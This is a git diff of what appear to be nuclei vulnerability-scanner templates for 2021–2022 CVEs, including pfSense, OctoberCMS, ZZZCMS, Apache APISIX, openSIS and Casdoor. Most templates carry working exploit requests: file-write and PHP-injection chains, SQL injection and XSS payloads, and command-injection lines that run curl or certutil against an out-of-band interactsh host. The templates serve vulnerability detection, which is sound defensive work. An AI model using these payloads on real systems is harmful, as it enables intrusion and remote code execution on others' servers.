cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-41266 cwe-id: CWE-306 + remediation: 'Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside + the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes + service account token.' + tags: cve,cve2021,minio requests: - raw: @@ -43,4 +46,6 @@ requests: - type: word part: header words: - - "token" \ No newline at end of file + - "token" + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-41277.yaml b/cves/2021/CVE-2021-41277.yaml index d47d490eac..b2dd58b649 100644 --- a/cves/2021/CVE-2021-41277.yaml +++ b/cves/2021/CVE-2021-41277.yaml @@ -3,20 +3,22 @@ id: CVE-2021-41277 info: name: Metabase Local File Inclusion author: 0x_Akoko - severity: critical - description: Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you’re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application. + severity: high + description: Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. reference: - https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr - https://nvd.nist.gov/vuln/detail/CVE-2021-41277 - https://twitter.com/90security/status/1461923313819832324 - metadata: - shodan-query: http.title:"Metabase" - fofa-query: app="Metabase" + - https://github.com/metabase/metabase/commit/042a36e49574c749f944e19cf80360fd3dc322f0 + remediation: This issue is fixed in 0.40.5 and .40.5 and higher. If you are unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application. classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L - cvss-score: 10.0 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2021-41277 - cwe-id: CWE-200 + cwe-id: CWE-20 + metadata: + fofa-query: app="Metabase" + shodan-query: http.title:"Metabase" tags: cve,cve2021,metabase,lfi requests: @@ -33,4 +35,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-41282.yaml b/cves/2021/CVE-2021-41282.yaml new file mode 100644 index 0000000000..971c79f985 --- /dev/null +++ b/cves/2021/CVE-2021-41282.yaml @@ -0,0 +1,55 @@ +id: CVE-2021-41282 + +info: + name: pfSense Arbitrary File Write to RCE + author: cckuailong + severity: high + description: diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (i.e., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location. + reference: + - https://www.shielder.it/advisories/pfsense-remote-command-execution/ + - https://www.rapid7.com/db/modules/exploit/unix/http/pfsense_diag_routes_webshell/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-41282 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2021-41282 + cwe-id: CWE-94 + tags: cve,cve2021,pfsense,rce,authenticated + +requests: + - raw: + - | + GET /index.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + __csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login= + + - | + GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x3c\x3fphp+var_dump(md5(\x27CVE-2021-41282\x27));unlink(__FILE__)\x3b\x3f\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1 + Host: {{Hostname}} + + - | + GET /test.php HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + extractors: + - type: regex + name: csrf_token + part: body + internal: true + group: 1 + regex: + - '(sid:[a-z0-9,;:]+)' + + matchers: + - type: dsl + dsl: + - "contains(body, 'c3959e8a43f1b39b0d1255961685a238')" + - "status_code==200" + condition: and \ No newline at end of file diff --git a/cves/2021/CVE-2021-41291.yaml b/cves/2021/CVE-2021-41291.yaml index b0e8b161ea..10aefe5f92 100644 --- a/cves/2021/CVE-2021-41291.yaml +++ b/cves/2021/CVE-2021-41291.yaml @@ -4,16 +4,18 @@ info: name: ECOA Building Automation System - Directory Traversal Content Disclosure author: gy741 severity: high - description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device + description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-41291 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html - tags: cve,cve2021,ecoa,lfi + - https://www.twcert.org.tw/tw/cp-132-5127-3cbd3-1.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2021-41291 cwe-id: CWE-22 + tags: cve,cve2021,ecoa,lfi,traversal requests: - raw: @@ -24,4 +26,6 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0:" \ No newline at end of file + - "root:.*:0:0:" + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-41293.yaml b/cves/2021/CVE-2021-41293.yaml index 4a4c48e176..ab9790a110 100644 --- a/cves/2021/CVE-2021-41293.yaml +++ b/cves/2021/CVE-2021-41293.yaml @@ -1,19 +1,21 @@ id: CVE-2021-41293 info: - name: ECOA Building Automation System - LFD + name: ECOA Building Automation System - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information. + description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose + sensitive and system information. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-41293 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html - tags: cve,cve2021,ecoa,lfi classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2021-41293 cwe-id: CWE-22 + tags: cve,cve2021,ecoa,lfi,disclosure requests: - raw: @@ -28,8 +30,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2021/CVE-2021-41349.yaml b/cves/2021/CVE-2021-41349.yaml index 225d1a6a33..c1c31e9fbf 100644 --- a/cves/2021/CVE-2021-41349.yaml +++ b/cves/2021/CVE-2021-41349.yaml @@ -1,19 +1,20 @@ id: CVE-2021-41349 info: - name: Pre-Auth POST Based Reflected XSS in Microsoft Exchange + name: Microsoft Exchange Server Pre-Auth POST Based Reflected Cross-Site Scripting author: rootxharsh,iamnoooob severity: medium - tags: cve,cve2021,xss,microsoft,exchange - description: Microsoft Exchange Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-42305. + description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305. reference: + - https://www.microsoft.com/en-us/download/details.aspx?id=103643 - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349 - https://nvd.nist.gov/vuln/detail/CVE-2021-41349 - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N - cvss-score: 6.50 + cvss-score: 6.5 cve-id: CVE-2021-41349 + tags: cve,cve2021,xss,microsoft,exchange requests: - raw: @@ -39,4 +40,6 @@ requests: - type: status status: - - 500 \ No newline at end of file + - 500 + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2021/CVE-2021-41381.yaml b/cves/2021/CVE-2021-41381.yaml index ff9081fb62..3967477b8a 100644 --- a/cves/2021/CVE-2021-41381.yaml +++ b/cves/2021/CVE-2021-41381.yaml @@ -3,17 +3,18 @@ id: CVE-2021-41381 info: name: Payara Micro Community 5.2021.6 Directory Traversal author: pikpikcu - severity: medium - description: Payara Micro Community 5.2021.6 and below allows Directory Traversal + severity: high + description: Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability. reference: - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt - https://nvd.nist.gov/vuln/detail/CVE-2021-41381 - tags: cve,cve2021,payara,lfi + - https://www.payara.fish classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2021-41381 cwe-id: CWE-22 + tags: cve,cve2021,payara,lfi requests: - method: GET @@ -28,3 +29,5 @@ requests: - "payara.security.openid.sessionScopedConfiguration=true" condition: and part: body + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2021/CVE-2021-41467.yaml b/cves/2021/CVE-2021-41467.yaml index 67ba68c3a7..d82d191d05 100644 --- a/cves/2021/CVE-2021-41467.yaml +++ b/cves/2021/CVE-2021-41467.yaml @@ -1,21 +1,21 @@ id: CVE-2021-41467 info: - name: JustWriting - Reflected XSS + name: JustWriting - Reflected Cross-Site Scripting author: madrobot severity: medium - description: Cross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter. + description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter. reference: - https://github.com/hjue/JustWriting/issues/106 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41467 + - https://nvd.nist.gov/vuln/detail/CVE-2021-41467 + - https://github.com/hjue/JustWriting/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-41467 cwe-id: CWE-79 tags: cve,cve2021,justwriting,xss - requests: - method: GET path: @@ -36,3 +36,5 @@ requests: words: - "text/html" part: header + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2021/CVE-2021-41648.yaml b/cves/2021/CVE-2021-41648.yaml index cd7789ebef..3df8e64753 100644 --- a/cves/2021/CVE-2021-41648.yaml +++ b/cves/2021/CVE-2021-41648.yaml @@ -1,17 +1,20 @@ id: CVE-2021-41648 info: - name: PuneethReddyHC online-shopping-system-advanced SQL Injection action.php + name: PuneethReddyHC action.php SQL Injection author: daffainfo severity: high - description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input. - reference: https://github.com/MobiusBinary/CVE-2021-41648 - tags: cve,cve2021,sqli + description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. Using a post request does not sanitize the user input. + reference: + - https://github.com/MobiusBinary/CVE-2021-41648 + - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system + - https://nvd.nist.gov/vuln/detail/CVE-2021-41649 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2021-41648 cwe-id: CWE-89 + tags: cve,cve2021,sqli,injection requests: - method: POST @@ -38,3 +41,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2021/CVE-2021-41649.yaml b/cves/2021/CVE-2021-41649.yaml index f9b72ad760..62b8d68451 100644 --- a/cves/2021/CVE-2021-41649.yaml +++ b/cves/2021/CVE-2021-41649.yaml @@ -1,17 +1,20 @@ id: CVE-2021-41649 info: - name: PuneethReddyHC online-shopping-system-advanced SQL Injection homeaction.php + name: PuneethReddyHC Online Shopping System homeaction.php SQL Injection author: daffainfo severity: critical - description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input. - reference: https://github.com/MobiusBinary/CVE-2021-41649 - tags: cve,cve2021,sqli + description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping System through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input. + reference: + - https://github.com/MobiusBinary/CVE-2021-41649 + - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system + - https://nvd.nist.gov/vuln/detail/CVE-2021-41649 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-41649 cwe-id: CWE-89 + tags: cve,cve2021,sqli,injection requests: - method: POST @@ -37,3 +40,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2021/CVE-2021-41653.yaml b/cves/2021/CVE-2021-41653.yaml index 4626e4d030..bbc4fdbe67 100644 --- a/cves/2021/CVE-2021-41653.yaml +++ b/cves/2021/CVE-2021-41653.yaml @@ -2,15 +2,17 @@ id: CVE-2021-41653 info: name: TP-Link - OS Command Injection - description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted payload in an IP address input field. author: gy741 severity: critical + description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field. reference: - https://k4m1ll0.com/cve-2021-41653.html - https://nvd.nist.gov/vuln/detail/CVE-2021-41653 + - https://www.tp-link.com/us/press/security-advisory/ + remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109". classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-41653 cwe-id: CWE-94 tags: cve,cve2021,tplink,rce,router @@ -43,6 +45,8 @@ requests: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + +# Enhanced by mp on 2022/02/27 diff --git a/cves/2021/CVE-2021-41691.yaml b/cves/2021/CVE-2021-41691.yaml new file mode 100644 index 0000000000..e4c0c19078 --- /dev/null +++ b/cves/2021/CVE-2021-41691.yaml @@ -0,0 +1,51 @@ +id: CVE-2021-41691 + +info: + name: openSIS Student Information System 8.0 SQL Injection + author: Bartu Utku SARP + severity: high + description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php. + reference: + - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691 + - https://www.exploit-db.com/exploits/50637 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169 + classification: + cve-id: CVE-2021-41691 + tags: cve,cve2021,opensis,sqli,auth + +requests: + - raw: + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + USERNAME={{username}}&PASSWORD={{password}}&language=en&log= + + - | + POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 + + attack: pitchfork + payloads: + username: + - student + + password: + - student@123 + + req-condition: true + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "' + condition: and + + - type: status + status: + - 200 diff --git a/cves/2022/CVE-2022-21705.yaml b/cves/2022/CVE-2022-21705.yaml new file mode 100644 index 0000000000..397ba79309 --- /dev/null +++ b/cves/2022/CVE-2022-21705.yaml @@ -0,0 +1,107 @@ +id: CVE-2022-21705 + +info: + name: OctoberCMS Authenticated Remote Code Execution + author: iPhantasmic + severity: high + description: | + Octobercms is a self-hosted CMS platform based on the Laravel PHP Framework. In affected versions user input was not properly sanitized before rendering. An authenticated user with the permissions to create, modify and delete website pages can exploit this vulnerability to bypass `cms.safe_mode` / `cms.enableSafeMode` in order to execute arbitrary code. This issue only affects admin panels that rely on safe mode and restricted permissions. To exploit this vulnerability, an attacker must first have access to the backend area. + remediation: | + The issue has been patched in Build 474 (v1.0.474) and v1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe to your installation manually. + reference: + - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe + - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22 + - https://cyllective.com/blog/post/octobercms-cve-2022-21705/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-21705 + cwe-id: CWE-74 + tags: cve,cve2022,authenticated,rce,cms,octobercms,injection + + +requests: + - raw: + - | # to obtain session_key and token + GET /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + + - | # to perform authentication and obtain admin cookies + POST /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + _session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}} + + - | # to inject php code in Markup editor and perform exploit + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onSave + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0 + + - | # to obtain theme + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onCreateTemplate + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&search=&type=page + + - | # to access the template page for generated exploit + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onOpenTemplate + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm + + cookie-reuse: true + + extractors: + - type: xpath + name: session_key + attribute: value + xpath: + - "/html/body/div[1]/div/div[2]/div/div/form/input[1]" + internal: true + # Obtain _session_key for current OctoberCMS session + + - type: xpath + name: token + attribute: value + xpath: + - "/html/body/div[1]/div/div[2]/div/div/form/input[2]" + internal: true + # Obtain _token for current OctoberCMS session + + - type: regex + name: theme + part: body + group: 1 + regex: + - '

301 Moved Permanently

' + + - type: regex + part: location + regex: + - 'https?:\/\/(.*):' + + extractors: + - type: regex + part: location + group: 1 + regex: + - 'https?:\/\/(.*):' + +# Enhanced by mp on 2022/03/28 diff --git a/cves/2022/CVE-2022-23808.yaml b/cves/2022/CVE-2022-23808.yaml new file mode 100644 index 0000000000..b174bac40d --- /dev/null +++ b/cves/2022/CVE-2022-23808.yaml @@ -0,0 +1,49 @@ +id: CVE-2022-23808 + +info: + name: phpMyAdmin < 5.1.2 - Cross-Site Scripting + author: cckuailong,daffainfo + severity: medium + description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection. + reference: + - https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A + - https://github.com/dipakpanchal456/CVE-2022-23808 + - https://nvd.nist.gov/vuln/detail/CVE-2022-23808 + - https://www.phpmyadmin.net/security/PMASA-2022-2/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-23808 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.component:"phpmyadmin" + tags: cve,cve2022,phpmyadmin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + - "{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "\">" + - "

Add a new server

" + - "phpMyAdmin setup" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# Enhanced by mp on 2022/03/08 diff --git a/cves/2022/CVE-2022-23881.yaml b/cves/2022/CVE-2022-23881.yaml new file mode 100644 index 0000000000..73150a422c --- /dev/null +++ b/cves/2022/CVE-2022-23881.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-23881 + +info: + name: ZZZCMS zzzphp 2.1.0 - Remote Code Execution + author: pikpikcu + severity: critical + description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php. + reference: + - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md + - http://www.zzzcms.com + - https://nvd.nist.gov/vuln/detail/CVE-2022-23881 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-23881 + cwe-id: CWE-77 + tags: cve,cve2022,rce,zzzphp,zzzcms + +requests: + - raw: + - | + GET /?location=search HTTP/1.1 + Host: {{Hostname}} + Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 500 + +# Enhanced by mp on 2022/04/19 diff --git a/cves/2022/CVE-2022-23944.yaml b/cves/2022/CVE-2022-23944.yaml new file mode 100644 index 0000000000..de7aa65f39 --- /dev/null +++ b/cves/2022/CVE-2022-23944.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-23944 + +info: + name: Apache ShenYu Admin Unauth Access + author: cckuakilong + severity: critical + description: Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1. + reference: + - https://github.com/apache/incubator-shenyu/pull/2462 + - https://nvd.nist.gov/vuln/detail/CVE-2022-23944 + - https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md + - https://lists.apache.org/thread/dbrjnnlrf80dr0f92k5r2ysfvf1kr67y + remediation: Upgrade to Apache ShenYu (incubating) 2.4.2 or apply the appropriate patch. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 + cve-id: CVE-2022-23944 + cwe-id: CWE-306 + tags: cve,cve2022,shenyu,unauth,apache + +requests: + - method: GET + path: + - "{{BaseURL}}/plugin" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"message":"query success"' + - '"code":200' + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/08 diff --git a/cves/2022/CVE-2022-24112.yaml b/cves/2022/CVE-2022-24112.yaml new file mode 100644 index 0000000000..119a801f06 --- /dev/null +++ b/cves/2022/CVE-2022-24112.yaml @@ -0,0 +1,80 @@ +id: CVE-2022-24112 + +info: + name: Apache APISIX - Remote Code Execution + author: Mr-xn + severity: critical + description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. + reference: + - https://www.openwall.com/lists/oss-security/2022/02/11/3 + - https://twitter.com/sirifu4k1/status/1496043663704858625 + - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests + - https://nvd.nist.gov/vuln/detail/CVE-2022-24112 + remediation: Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`). + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-24112 + cwe-id: CWE-290 + metadata: + fofa-query: title="Apache APISIX Dashboard" + product: https://apisix.apache.org + shodan-query: title:"Apache APISIX Dashboard" + tags: cve,cve2022,apache,rce,apisix,oast + +requests: + - raw: + - | + POST /apisix/batch-requests HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + + { + "headers":{ + "X-Real-IP":"127.0.0.1", + "Content-Type":"application/json" + }, + "timeout":1500, + "pipeline":[ + { + "method":"PUT", + "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1", + "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl https://{{interactsh-url}}/`whoami`'); return true end\"}" + } + ] + } + - | + GET /api/{{randstr}} HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + + req-condition: true + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - '"reason":"OK"' + - '"status":200' + condition: and + + - type: status + status: + - 200 + + - type: word + part: interactsh_protocol + words: + - 'http' + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - 'GET \/([a-z-]+) HTTP' + +# Enhanced by mp on 2022/04/22 diff --git a/cves/2022/CVE-2022-24124.yaml b/cves/2022/CVE-2022-24124.yaml new file mode 100644 index 0000000000..c33c0d7f03 --- /dev/null +++ b/cves/2022/CVE-2022-24124.yaml @@ -0,0 +1,41 @@ +id: CVE-2022-24124 + +info: + name: Casdoor 1.13.0 - Unauthenticated SQL Injection + author: cckuailong + severity: high + description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations. + reference: + - https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html + - https://www.exploit-db.com/exploits/50792 + - https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget + - https://nvd.nist.gov/vuln/detail/CVE-2022-24124 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-24124 + cwe-id: CWE-89 + metadata: + product: https://casdoor.org/ + shodan-query: http.title:"Casdoor" + tags: cve,cve2022,casdoor,sqli,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "XPATH syntax error.*'" + - "casdoor" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/08 diff --git a/cves/2022/CVE-2022-24260.yaml b/cves/2022/CVE-2022-24260.yaml new file mode 100644 index 0000000000..e0535c78c8 --- /dev/null +++ b/cves/2022/CVE-2022-24260.yaml @@ -0,0 +1,49 @@ +id: CVE-2022-24260 + +info: + name: VoipMonitor - Pre-Auth SQL Injection + author: gy741 + severity: critical + description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level. + reference: + - https://kerbit.io/research/read/blog/3 + - https://nvd.nist.gov/vuln/detail/CVE-2022-24260 + - 